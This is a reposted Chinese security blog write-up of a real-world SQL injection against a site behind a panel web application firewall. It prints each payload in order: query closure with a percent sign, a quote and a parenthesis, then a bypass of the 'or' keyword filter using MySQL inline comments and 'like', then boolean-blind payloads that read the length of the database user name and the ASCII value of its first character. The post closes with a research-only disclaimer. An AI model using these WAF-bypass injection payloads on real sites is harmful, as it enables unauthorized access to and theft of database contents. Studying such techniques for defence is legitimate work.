文章总结： 文档记录了一次针对某面板防火墙的SQL注入实战过程。测试者通过手动输入单引号触发报错，利用%号、引号和括号配合注释实现闭合，发现or关键字后被拦截但通过’1’=/!1/等注释绕过检测。最终成功利用布尔注入获取数据库用户信息长度和ASCII值，展示了特定防火墙规则下的注入绕过技巧。 综合评分： 78 文章分类： WEB安全,渗透测试,漏洞分析,实战经验

实战SQL注入某面板防火墙绕过

原创

Vlan911 Vlan911

我不懂安全

2026年5月6日 09:17 北京

在小说阅读器读本章

去阅读

近期的一次SQL注入实战，通过手动测试发现站点存在SQL注入漏洞，首先在探测的时候，输入单引号查看效果

再输入单引号进行闭合

通过报错信息可以直到，想要达到闭合条件最好还是使用%号、引号和括号，尝试闭合配合注释

尝试使用布尔注入的时候，发现被拦截了

但是去掉or后面的字符就不拦截keyword=123%’+or+)–+-

尝试对or使用||、&、等编码转换，都会被拦截，似乎只要or后面跟东西就被拦截，灵机一动，发现可以实现布尔条件，并且数据发生明显变化keyword=123%’+or+’1′)–+-

看似成功，实则拦截keyword=123%’+or+’1’=’1′)–+-

不过并没有什么用，这个时候就比较容易了，一手keyword=123%’+or+’1’=/*!1*/)–+-

尝试条件为假的时候keyword=123%’+or+’1’=/*!2*/)–+-

继续下一步的时候，发现似乎只能输入纯数字，字符串不行、函数也不行

keyword=123%’+or+’1’=/*!length()*/)–+-

keyword=123%’+or+’1’=/*!’1’*/)–+-

这更好绕keyword=123%’+or+’1’+like+/*!length(1)*/)–+-

这个时候再构造个假条件keyword=123%’+or+’1’+like+/*!length(12)*/)–+-

没问题，此时尝试获取数据库当前用户名长度

keyword=123%’+or+’25’+like+/*!length(user())*/)–+-

获取当前数据库用户名第一位对应的ascii值

keyword=123%’+or+’100’+like+/*!ascii(mid(user(),1,1))*/)–+-

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：我不懂安全 Vlan911 Vlan911《实战SQL注入某面板防火墙绕过》